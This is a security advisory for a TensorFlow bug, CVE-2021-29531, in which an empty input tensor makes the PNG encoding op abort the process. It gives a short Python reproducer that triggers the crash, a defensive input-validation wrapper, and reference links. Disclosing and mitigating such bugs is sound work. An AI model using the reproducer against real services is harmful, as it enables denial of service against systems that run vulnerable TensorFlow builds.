CVE-2021-29531: CHECK-fail in tf.raw_ops.EncodePng
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data:

```python
import tensorflow as tf
image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)
```
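A caller-side guard for the case above, as an added example that is not code from the advisory or from TensorFlow: it rejects empty or malformed pixel tensors with a catchable exception before they reach `tf.raw_ops.EncodePng`. The names `InvalidPngInput`, `check_png_encodable`, `is_png_encodable` and `safe_encode_png` are hypothetical, and the accepted dtypes and channel counts assume the op's documented `[height, width, channels]` input.

```python
# Added example: a pre-call validation layer, not TensorFlow's upstream fix.
ALLOWED_DTYPES = {"uint8", "uint16"}   # assumption: dtypes the op documents
ALLOWED_CHANNELS = {1, 2, 3, 4}        # grayscale, gray+alpha, RGB, RGBA


class InvalidPngInput(ValueError):
    """Raised in Python so a bad tensor never reaches the native kernel."""


def check_png_encodable(shape, dtype_name):
    """Validate a (shape, dtype) pair; return the pixel element count."""
    shape = tuple(shape)
    if dtype_name not in ALLOWED_DTYPES:
        raise InvalidPngInput(f"unsupported dtype {dtype_name!r}")
    if len(shape) != 3:
        raise InvalidPngInput(f"expected rank 3, got rank {len(shape)}")
    if any(d is None for d in shape):
        raise InvalidPngInput("shape must be fully known before encoding")
    height, width, channels = shape
    if channels not in ALLOWED_CHANNELS:
        raise InvalidPngInput(f"channels must be 1-4, got {channels}")
    if height <= 0 or width <= 0:
        # The advisory's reproducer has shape [0, 0, 3]: no pixel data.
        raise InvalidPngInput(f"empty image {height}x{width}")
    return height * width * channels


def is_png_encodable(shape, dtype_name):
    """Boolean form of the check, for filtering untrusted inputs."""
    try:
        check_png_encodable(shape, dtype_name)
    except InvalidPngInput:
        return False
    return True


def safe_encode_png(image):
    """Encode only after validation; imports TensorFlow lazily."""
    import tensorflow as tf
    check_png_encodable(image.shape.as_list(), image.dtype.name)
    return tf.raw_ops.EncodePng(image=image)
```

Rejecting the input in Python turns a process abort into an error the serving code can handle per request.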
References
- github.com/advisories/GHSA-3qxp-qjq7-w4hf
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-459.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-657.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-168.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/26eb323554ffccd173e8a79a8c05c15b685ae4d1
- github.com/tensorflow/tensorflow/security/advisories/GHSA-3qxp-qjq7-w4hf
- nvd.nist.gov/vuln/detail/CVE-2021-29531